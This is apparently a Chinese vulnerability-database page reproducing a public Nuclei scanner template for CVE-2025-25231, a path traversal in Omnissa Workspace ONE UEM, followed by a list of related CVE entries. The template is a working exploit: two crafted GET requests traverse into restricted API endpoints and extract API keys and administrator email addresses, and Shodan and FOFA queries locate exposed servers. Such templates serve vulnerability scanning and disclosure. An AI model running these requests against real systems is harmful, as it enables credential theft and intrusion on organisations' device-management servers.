CVE-2025-25231: Omnissa Workspace ONE UEM - Path Traversal

日期: 2025-08-01 | 影响软件: Omnissa Workspace ONE UEM | POC: 已公开

漏洞描述

Omnissa Workspace ONE UEM contains a path traversal caused by crafted GET requests to restricted API endpoints, letting malicious actors access sensitive information, exploit requires sending crafted requests.

PoC代码[已公开]

id: CVE-2025-25231

info:
  name: Omnissa Workspace ONE UEM - Path Traversal
  author: DhiyaneshDK,slcyber
  severity: high
  description: |
    Omnissa Workspace ONE UEM contains a path traversal caused by crafted GET requests to restricted API endpoints, letting malicious actors access sensitive information, exploit requires sending crafted requests.
  impact: |
    Malicious actors can access sensitive information by exploiting path traversal in API endpoints.
  remediation: |
    Update to the latest version.
  reference:
    - https://slcyber.io/assetnote-security-research-center/secondary-context-path-traversal-in-omnissa-workspace-one-uem/#wrap-up-&-acknowledgements
    - https://www.omnissa.com/omsa-2025-0004/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-25231
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: workspace_one_uem_console
    fofa-query: banner="/airwatch/default.aspx" || header="/airwatch/default.aspx"
    shodan-query: html:"/airwatch/default.aspx"
  tags: cve,cve2025,omnissa,workspace,airwatch,traversal,vkev

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/groups/apikeys%3fogname=Global HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "service_name","api_key")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: json
        name: api_key
        json:
          - '.api_keys[].api_key'

  - raw:
      - |
        GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/admins/search?status=active%3fogname=Global HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "AdminUser","Uuid")'
          - 'contains(content_type, "application/xml")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        part: body
        name: admin_email
        group: 1
        regex:
          - '<Email>([^<]+)</Email>'
# digest: 4a0a00473045022100c34fcb7d65709bbf004b96bd1ba0bccfb038bc247c0b203c6afe3593714cc0420220272e0e523ffe69e72b91af006b5ad2ec380bc68686b8e049ecec0189fb3ad3fe:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-25231.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Omnissa Workspace ONE UEM CVE-2025-25231 路径遍历 无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

Wordpress Plugin Ultimate Auction Pro /wp-admin/admin-ajax.php uwa_see_more_bids_ajax SQL 注入漏洞 （CVE-2025-4204） 无POC

Flowise /api/v1/account/forgot-password 未授权访问漏洞（CVE-2025-58434） 无POC

Omnissa Workspace ONE UEM CVE-2025-25231 路径遍历无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC

Wordpress Plugin Ultimate Auction Pro /wp-admin/admin-ajax.php uwa_see_more_bids_ajax SQL 注入漏洞（CVE-2025-4204）无POC

Flowise /api/v1/account/forgot-password 未授权访问漏洞（CVE-2025-58434）无POC